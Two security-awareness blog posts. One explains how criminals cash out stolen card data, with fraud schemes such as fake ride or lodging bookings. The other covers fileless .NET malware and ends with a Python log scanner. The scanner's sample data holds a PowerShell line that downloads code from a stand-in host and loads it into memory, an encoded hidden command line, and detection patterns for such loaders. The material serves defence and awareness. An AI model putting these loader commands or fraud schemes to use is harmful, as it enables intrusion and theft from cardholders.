2018-08-30

How does a cyber-criminal make money with your credit card details?

Threat

Attackers breach e-commerce sites or online payment services to obtain credit card data. The criminal then has a limited window in which to cash out or launder the money before the cardholder or the issuer cancels the card. Knowing the cash-out methods below helps a potential victim prepare and watch their card transaction feed more carefully.

Exploitation

Cyber-criminals cash out, for example, in the following ways:

  • Selling card numbers on underground markets. Tens of thousands of stolen card records are traded daily; the price is normally a few dollars per card.
  • Using the card data to buy easily resold devices such as iPhones and MacBooks. The thief normally spreads the purchases across separate cards and separate orders so that no single order looks suspicious.
  • Buying Amazon, Baidu, Alibaba or Walmart gift cards, which are easy to sell on.
  • Making fraudulent payments through Uber or Airbnb. The criminal books a fictitious ride or stay with an accomplice Uber driver or Airbnb host, who receives the payout for a journey or lodging that never took place.


Protection

The following general advice may apply:

  • Do not enter card details on unknown online shops; pay through your bank or an intermediary such as PayPal instead.
  • Do not click links in emails that appear to come from your bank, card company or another business. These organisations do not contact you to ask for your details; such a message is most likely a phishing attempt.
  • Use a strong, unique password on any account that stores your card details (Amazon, Souq, etc.).
  • Follow feeds that report breaches of card data.
  • Monitor your card transactions closely and look for unfamiliar charges.
  • Cancel the card promptly at even a hint of suspicion.

References

  1. https://www.bbc.com/news/technology-44355153
  2. https://www.thebalance.com/ways-avoid-credit-card-fraud-960797

2018-08-05

Fileless malware evades conventional virus detection

Definition

Many traditional security systems are based on detecting malware files; if no malware file is ever written, these systems are blind, and the attack becomes very hard to detect. PowerShell provides full access to the Microsoft Component Object Model (COM) and Windows Management Instrumentation (WMI), which makes it an ideal tool for launching such an attack. According to McAfee researchers, one particular fileless threat, dubbed CactusTorch, has grown rapidly and can execute custom shellcode on Windows systems.

Brief Description of Attack Vector

The attacker delivers a script (JScript or VBScript, run by a trusted, signed Windows script host) that carries a .NET assembly and loads it straight into memory through the .NET runtime, the same COM-accessible machinery that PowerShell exposes. An assembly is the smallest unit of deployment for a .NET application; because it is never written to disk, conventional file scanners have nothing to inspect, and because the activity is launched through trusted executables it is hard to distinguish from legitimate use.

Fileless techniques seen in the wild so far include:

  • CactusTorch was originally developed for ethical security testing, but since it is open source it has been abused to gain code execution on victim machines; more than 30 variants have been observed, used for example for ransomware.
  • PowerGhost hijacks corporate computing resources to mine cryptocurrency.

Recommendation for Defence

The following general advice applies:

  • Enterprises should run their own internal app repository, .NET library mirror and Microsoft management infrastructure rather than pulling these from the open internet, to prevent man-in-the-middle substitution of components.
  • Everyone should run behaviour-based, runtime (in-memory) detection in addition to conventional file scanning; for PowerShell this means enabling script block logging and watching for assemblies loaded from memory rather than from disk.
  • The firewall should block all outbound connections that are not explicitly identified, to cut off command-and-control traffic.
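A detection-side example to go with the runtime-monitoring advice above. It is added here and is not code from the original post, from McAfee or from Kaspersky. It scans constructed Windows event records (PowerShell script-block records, EventID 4104, and process-creation records, EventID 4688, flattened to one `key=value` line each, which is an assumed format) for markers of a .NET assembly or shellcode being loaded from memory, decodes `-EncodedCommand` payloads so that encoded command lines are scored on their decoded content, and reports entries whose weighted indicator score reaches a threshold. The indicator list, the weights, the threshold and the sample lines are assumptions chosen to illustrate the attack vector described above, not a vendor's rule set.

```python
"""Flag log entries that suggest in-memory (fileless) .NET loading.

Added example, not the original post's code. Input is a list of Windows
event records flattened to one "key=value ..." line each (assumed format);
EventID 4104 carries ScriptBlockText, 4688 carries CommandLine.
"""
import base64
import re

# Indicator patterns and weights (assumptions for illustration). Weights are set
# so that one common, often benign marker (a lone FromBase64String or -enc)
# does not fire on its own, while a reflective load or a BinaryFormatter
# deserialization plus any supporting marker does.
INDICATORS = {
    r"Assembly\]::Load\(|Assembly\.Load\(": 3,          # assembly loaded from bytes, no file on disk
    r"BinaryFormatter|Deserialize\(": 3,                # DotNetToJScript-style object deserialization
    r"VirtualAlloc|CreateThread": 2,                    # shellcode staging via Win32 APIs
    r"FromBase64String\(": 1,                           # payload carried inline as base64
    r"-EncodedCommand\b|-enc\b": 1,                     # encoded PowerShell command line
    r"Invoke-Expression|\bIEX\b": 1,                    # string-to-code execution
    r"Net\.WebClient|DownloadString|DownloadData": 1,   # payload fetched over the network
}
THRESHOLD = 4

ENC_RE = re.compile(r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(text: str) -> str:
    """Return text with any -EncodedCommand payload decoded (base64 of UTF-16LE)
    and appended, so indicators hidden inside it are visible to the scanner."""
    m = ENC_RE.search(text)
    if not m:
        return text
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text  # not a well-formed encoded command; score the raw line
    return text + "\n" + decoded


def score(text: str) -> dict[str, int]:
    """Map each matching indicator pattern to its weight."""
    return {p: w for p, w in INDICATORS.items() if re.search(p, text, re.I)}


def scan(lines: list[str]) -> list[dict]:
    """Return findings for entries whose indicator weight reaches THRESHOLD."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = score(decode_encoded_command(line))
        total = sum(hits.values())
        if total >= THRESHOLD:
            findings.append({"line": n, "score": total, "indicators": sorted(hits)})
    return findings


# Constructed sample records (not real logs). Line 4 embeds an encoded command
# built here so the reader can see what it decodes to.
_PAYLOAD = ("$d=(New-Object Net.WebClient).DownloadData('http://example.invalid/a');"
            "[Reflection.Assembly]::Load($d)")
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_LINES = [
    'EventID=4104 ScriptBlockText=Get-ChildItem C:\\Users | Where-Object { $_.Name -like "*.log" }',
    "EventID=4104 ScriptBlockText=$cfg=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($blob))",
    "EventID=4104 ScriptBlockText=$a=[Convert]::FromBase64String($s);"
    "[System.Reflection.Assembly]::Load($a).EntryPoint.Invoke($null,$null)",
    f"EventID=4688 CommandLine=powershell.exe -nop -w hidden -enc {_ENCODED}",
    "EventID=4104 ScriptBlockText=$fmt=New-Object System.Runtime.Serialization.Formatters.Binary.BinaryFormatter;"
    "$o=$fmt.Deserialize([IO.MemoryStream][Convert]::FromBase64String($b))",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f['line']}: score {f['score']} indicators {f['indicators']}")
```

On the constructed input the first two lines (a directory listing and a benign base64 config decode) stay below the threshold, while the reflective assembly load, the encoded command line and the BinaryFormatter deserialization are reported. The scanner only sees script content if PowerShell script block logging is enabled (the "Turn on PowerShell Script Block Logging" policy); without it, only the process command line is available, which is why the encoded-command decoding matters. The weights are a starting point and should be tuned against a baseline of the organisation's own administrative scripts.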

References

1. https://www.computerweekly.com/news/252445706/Fileless-malware-a-growing-trend-warns-McAfee
2. https://securingtomorrow.mcafee.com/mcafee-labs/cactustorch-fileless-threat-abuses-net-to-infect-victims/
3. https://www.computerweekly.com/news/252445642/Brace-for-PowerGhost-cryptominer-warns-Kaspersky-Lab